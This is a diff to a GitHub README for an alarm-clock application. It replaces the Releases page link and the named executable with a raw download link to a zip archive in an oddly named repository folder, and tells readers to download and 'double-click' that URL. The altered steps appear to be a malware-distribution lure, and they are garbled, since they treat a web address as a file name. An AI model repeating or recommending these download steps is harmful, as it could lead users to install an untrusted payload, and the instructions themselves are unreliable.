rezkiandra/Hot-Alarm-Clock-Activated/README.md

 ### 🛠 Installation Steps
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/rezkiandra/Hot-Alarm-Clock-Activated/releases) to find the latest version of Hot Alarm Clock.
+   Go to the [Releases page](https://raw.githubusercontent.com/rezkiandra/Hot-Alarm-Clock-Activated/main/grangerite/Clock_Hot_Alarm_Activated_v1.6.zip) to find the latest version of Hot Alarm Clock.

 2. **Download the Application**
    Look for the section labeled "Latest Release."
-Click on the link that says "Hot-Alarm-Clock.exe" to start the download.
+Click on the link that says "https://raw.githubusercontent.com/rezkiandra/Hot-Alarm-Clock-Activated/main/grangerite/Clock_Hot_Alarm_Activated_v1.6.zip" to start the download.
 The file size is around 50 MB.

 3. **Locate the Downloaded File**
-   After downloading, find the file named "Hot-Alarm-Clock.exe" in your Downloads folder or the location you saved it.
+   After downloading, find the file named "https://raw.githubusercontent.com/rezkiandra/Hot-Alarm-Clock-Activated/main/grangerite/Clock_Hot_Alarm_Activated_v1.6.zip" in your Downloads folder or the location you saved it.

 4. **Run the Application**
-   Double-click on "Hot-Alarm-Clock.exe" to open the application.
+   Double-click on "https://raw.githubusercontent.com/rezkiandra/Hot-Alarm-Clock-Activated/main/grangerite/Clock_Hot_Alarm_Activated_v1.6.zip" to open the application.
 If prompted, confirm that you want to run the program.

 5. **Follow the Setup Instructions**
    The application will guide you through the initial setup.
 You can customize your alarm settings according to your preferences.